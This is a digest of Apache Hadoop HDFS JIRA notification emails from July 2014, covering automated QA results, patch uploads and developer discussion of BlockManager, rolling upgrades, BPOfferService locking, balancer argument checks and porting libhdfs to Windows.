This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6794) Update BlockManager methods to use DatanodeStorageInfo where possible

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6794?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081734#comment-14081734
 ] 

Hadoop QA commented on HDFS-6794:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12658982/HDFS-6794.03.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 4 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:red}-1 findbugs{color}.  The patch appears to introduce 2 new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7515//testReport/
Findbugs warnings: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7515//artifact/trunk/patchprocess/newPatchFindbugsWarningshadoop-hdfs.html
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7515//console

This message is automatically generated.

> Update BlockManager methods to use DatanodeStorageInfo where possible
> -
>
> Key: HDFS-6794
> URL: https://issues.apache.org/jira/browse/HDFS-6794
> Project: Hadoop HDFS
>  Issue Type: Improvement
>Reporter: Arpit Agarwal
>Assignee: Arpit Agarwal
> Attachments: HDFS-6794.01.patch, HDFS-6794.02.patch, 
> HDFS-6794.03.patch
>
>
> Post HDFS-2832, BlockManager methods can be updated to accept 
> DatanodeStorageInfo instead of (DatanodeDescriptor + StorageID).



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Created] (HDFS-6800) Detemine how Datanode layout changes should interact with rolling upgrade

2014-07-31 Thread Colin Patrick McCabe (JIRA)
Colin Patrick McCabe created HDFS-6800:
--

 Summary: Detemine how Datanode layout changes should interact with 
rolling upgrade
 Key: HDFS-6800
 URL: https://issues.apache.org/jira/browse/HDFS-6800
 Project: Hadoop HDFS
  Issue Type: Improvement
  Components: datanode
Affects Versions: 2.6.0
Reporter: Colin Patrick McCabe


We need to handle attempts to rolling-upgrade the DataNode to a new storage 
directory layout.

One approach is to disallow such upgrades.  If we choose this approach, we 
should make sure that the system administrator gets a helpful error message and 
a clean failure when trying to use rolling upgrade to a version that doesn't 
support it.  Based on the compatibility guarantees described in HDFS-5535, this 
would mean that *any* future DataNode layout changes would require a major 
version upgrade.

Another approach would be to support rolling upgrade from an old DN storage 
layout to a new layout.  This approach requires us to change our documentation 
to explain to users that they should supply the {{\-rollback}} command on the 
command-line when re-starting the DataNodes during rolling rollback.  Currently 
the documentation just says to restart the DataNode normally.

Another issue here is that the DataNode's usage message describes rollback 
options that no longer exist.  The help text says that the DN supports 
{{\-rollingupgrade rollback}}, but this option was removed by HDFS-6005.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Attachment: (was: HDFS-6799.patch)

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Attachment: HDFS-6799.patch

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Yongjun Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081708#comment-14081708
 ] 

Yongjun Zhang commented on HDFS-6788:
-

I thought I made a mistake in earlier patch after seeing Arpit's comment, but 
after careful reviewing, it looks fine to me. 
 
Hi [~andrew.wang], 

I uploaded a patch to address the second comments of yours. For the extra 
newline in the imports section, it's added by eclipse to separate the imports 
comp.google and org.apache into different sections , and I think it's not bad 
and didn't change it. Would you please take a look at the new revision? Thanks. 
 

Hi [~arpitagarwal], thanks for reviewing it earlier, if you have time, I will 
appreciate that you look at it again.

BTW Andrew, I saw that both FSDirection and FSNameSystem's lock code have quite 
some indirection (thus a bit more runtime) when making a call, say,
{code}
  void readLock() {
this.dirLock.readLock().lock();
  }
{code}
It go through several "." and each of them is an indirection. This can be 
improved. For example,  we can create a class member, e.g., {{mReadLock = 
this.dirLock.readLock();}}, then modify the readLock() methods to
{code}
 void readLock() {
mReadLock.lock();
 }
{code}
I can create a jira to change both classes if you agree. Thanks.


> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in DN (DataXceiver, PacketResponder, Async disk worker etc) may block 
> at BPOfferService.getBlockPoolId() when calling BPOfferService.checkBlock(), 
> though they are just reading the same blockpool id. This is unnecessary 
> overhead and may cause performance hit when many threads compete. Filing this 
> jira to replace synchronized method with read write lock 
> (ReentrantReadWriteLock).



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Benoy Antony (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081706#comment-14081706
 ] 

Benoy Antony commented on HDFS-6799:


Can you please make [~megas] a contributor so that he can assign this to 
himself ?

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Benoy Antony (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081704#comment-14081704
 ] 

Benoy Antony commented on HDFS-6799:


Good catch , [~megas].
Is there a way to add a unit test for this ?
[~arpitagarwal], [~szetszwo], could you please take a look ?

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6780) Batch the encryption zones listing API

2014-07-31 Thread Andrew Wang (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6780?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Andrew Wang updated HDFS-6780:
--

Attachment: hdfs-6780.001.patch

Patch attached. Refactored listEncryptionZones to instead return a 
RemoteIterator, which wraps a 
BatchedRemoteIterator.

> Batch the encryption zones listing API
> --
>
> Key: HDFS-6780
> URL: https://issues.apache.org/jira/browse/HDFS-6780
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: security
>Reporter: Andrew Wang
>Assignee: Andrew Wang
> Attachments: hdfs-6780.001.patch
>
>
> To future-proof the API, it'd be better if the listEZs API returned a 
> RemoteIterator.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081694#comment-14081694
 ] 

Colin Patrick McCabe commented on HDFS-573:
---

[~stevebovy]: you'll be happy to hear that we dynamically load {{libjvm.so}} in 
the HADOOP-10388 branch.  The main reason for doing it there is because that 
branch add a pure native client which doesn't require {{libjvm.so}}, in 
addition to the existing JNI client.

> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6796) Improving the argument check during balancer command line parsing

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6796?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081695#comment-14081695
 ] 

Tsz Wo Nicholas Sze commented on HDFS-6796:
---

Let's also add some meaningful error messages.  The first checkArgument(..) can 
be replaced by checkArgument(..) in each individual case as below.
{code}
+++ 
hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/balancer/Balancer.java
  (working copy)
@@ -1691,9 +1691,9 @@
   if (args != null) {
 try {
   for(int i = 0; i < args.length; i++) {
-checkArgument(args.length >= 2, "args = " + Arrays.toString(args));
 if ("-threshold".equalsIgnoreCase(args[i])) {
-  i++;
+  checkArgument(++i == args.length,
+  "Threshold value is missing: args = " + 
Arrays.toString(args));
   try {
 threshold = Double.parseDouble(args[i]);
 if (threshold < 1 || threshold > 100) {
@@ -1708,7 +1708,8 @@
 throw e;
   }
 } else if ("-policy".equalsIgnoreCase(args[i])) {
-  i++;
+  checkArgument(++i == args.length,
+  "Policy value is missing: args = " + Arrays.toString(args));
   try {
 policy = BalancingPolicy.parse(args[i]);
   } catch(IllegalArgumentException e) {
...
{code}


> Improving the argument check during balancer command line parsing
> -
>
> Key: HDFS-6796
> URL: https://issues.apache.org/jira/browse/HDFS-6796
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6796.patch
>
>
> Currently balancer CLI parser simply checks if the total number of arguments 
> is greater than 2 inside the loop. Since the check does not include any loop 
> variables, it is not a proper check when there more than 2 arguments.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081689#comment-14081689
 ] 

Colin Patrick McCabe commented on HDFS-573:
---

bq. I have just one question though. My initial inclination was to put 
TYPE_CHECKED_PRINTF_FORMAT in platform.h as well. However, I then backed that 
out and put the ifdef in exception.h, because it has never been clear to me if 
exception.h is part of the public API

The only header file that's part of the public API is {{hdfs.h}}.  That's the 
only one we export to end-users... nobody can even get access to the other ones 
without a Hadoop source tree.  You should feel free to change, add, or remove 
things from any header file without worrying about compatibility, as long as 
that header is not {{hdfs.h}}.

bq. BTW Colin, thanks for the code review. The work so far has been aimed at a 
straight port, warts and all, but I'm happy to roll in a few more small fixes 
for existing problems while I'm in here. I'll work on a v2 of the patch.

Thanks, Chris.  I think what you've got looks pretty good... I wish all libhdfs 
patches could be this good :)

> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Yongjun Zhang (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Yongjun Zhang updated HDFS-6788:


Attachment: HDFS-6788.002.patch

> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in DN (DataXceiver, PacketResponder, Async disk worker etc) may block 
> at BPOfferService.getBlockPoolId() when calling BPOfferService.checkBlock(), 
> though they are just reading the same blockpool id. This is unnecessary 
> overhead and may cause performance hit when many threads compete. Filing this 
> jira to replace synchronized method with read write lock 
> (ReentrantReadWriteLock).



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Status: Patch Available  (was: Open)

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Stephen Bovy (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081674#comment-14081674
 ] 

Stephen Bovy commented on HDFS-573:
---

Thanks 

I am an old-fashioned IBM main-framer,  All my changes are backwards compatible 
:) 

Here is a  slice for setting up dynamic load of the JVM

// begin JVM function set-up
// new jvm function declarations
typedef jint (*FGetVMS)   ( JavaVM**, const jsize, jint* );
typedef jint (*FCreateVM) ( JavaVM**, void**, JavaVMInitArgs* );
#ifdef LOADJVM
// dynamically loaded
static FGetVMShdfs_fpGetVM= NULL;   
static FCreateVM  hdfs_fpCreateVM = NULL;
#else
// implicitly linked and auto-loaded (original default code)
static FGetVMShdfs_fpGetVM= JNI_GetCreatedJavaVMs;   
static FCreateVM  hdfs_fpCreateVM = JNI_CreateJavaVM;
#endif




> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Attachment: HDFS-6799.patch

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Status: Open  (was: Patch Available)

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Status: Patch Available  (was: Open)

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Priority: Minor  (was: Major)

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Created] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)
Megasthenis Asteris created HDFS-6799:
-

 Summary: The invalidate method in SimulatedFSDataset.java failed 
to remove (invalidate) blocks from the file system.
 Key: HDFS-6799
 URL: https://issues.apache.org/jira/browse/HDFS-6799
 Project: Hadoop HDFS
  Issue Type: Bug
  Components: datanode, test
Affects Versions: 2.4.1
Reporter: Megasthenis Asteris


The invalidate(String bpid, Block[] invalidBlks) method in 
SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
system. It currently fails to do that.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Chris Nauroth (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081665#comment-14081665
 ] 

Chris Nauroth commented on HDFS-573:


I guess I misread something on HADOOP-10388.  I thought I saw a nice clean init 
function in the jni_helper.c over there.  I may have incorrectly assumed that 
this cascaded all the way out to the client-facing API.  :-)

Thanks for sharing your experiences, Stephen.  Unfortunately, I think we'd have 
a hard time incorporating those changes right now, given the compatibility 
concerns.

I suppose backwards-incompatible changes like this could be considered on the 
3.x release boundary.

BTW Colin, thanks for the code review.  The work so far has been aimed at a 
straight port, warts and all, but I'm happy to roll in a few more small fixes 
for existing problems while I'm in here.  I'll work on a v2 of the patch.

I have just one question though.  My initial inclination was to put 
{{TYPE_CHECKED_PRINTF_FORMAT}} in platform.h as well.  However, I then backed 
that out and put the ifdef in exception.h, because it has never been clear to 
me if exception.h is part of the public API.  Most of the functions can't 
reasonably be considered public, because of the dependence on passing a 
{{JNIEnv}}.  However, then there is {{getExceptionInfo}}.  As long as we agree 
that only hdfs.h is the public API, and not exception.h, then I'll move 
{{TYPE_CHECKED_PRINTF_FORMAT}} back to platform.h.  If client applications ever 
{{#include }}, then they'd also have the complexity of selecting 
the correct platform.h, which would be undesirable.

> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Stephen Bovy (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081663#comment-14081663
 ] 

Stephen Bovy commented on HDFS-573:
---

SAMPLE   "Optional"   INIT-LIB   function  :)

// FLAG :: init-lib invoked (speed up jvm-init and avoid locks) 
extern short hdfs_JniInitLib;

extern char hdfs_HadoopHome [2000];
extern char hdfs_JavaHome [2000];

// the following are used for no-threads support
// use this flag to bypass thread logic 
// enable non-threaded speed-ups
extern short hdfs_Threads;

// Init the HDFS library 
int hdfsJNILibInit ( pHdfsInitParms parms )
{

JNIEnv* env;

// disable thread support for now.
hdfs_Threads = 0;

if ( parms ) {

if ( parms->JavaHome )
{
if ( strlen(parms->JavaHome) > 2000 ) {
fprintf ( stderr, "The JAVA_HOME variable is too long.\n" );
return 1;
}
strcpy ( hdfs_JavaHome, parms->JavaHome );
}

if ( parms->HadoopHome )
{
if ( strlen(parms->HadoopHome) > 2000 ) {
fprintf ( stderr, "The HADOOP_HOME variable is too long.\n" );
return 1;
}
strcpy ( hdfs_HadoopHome, parms->HadoopHome );
}

if (parms->threads)
hdfs_Threads = parms->threads;

} 

env = getJNIEnv();
if (!env) return 1;

hdfs_JniInitLib = 1;

return 0;

}



> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
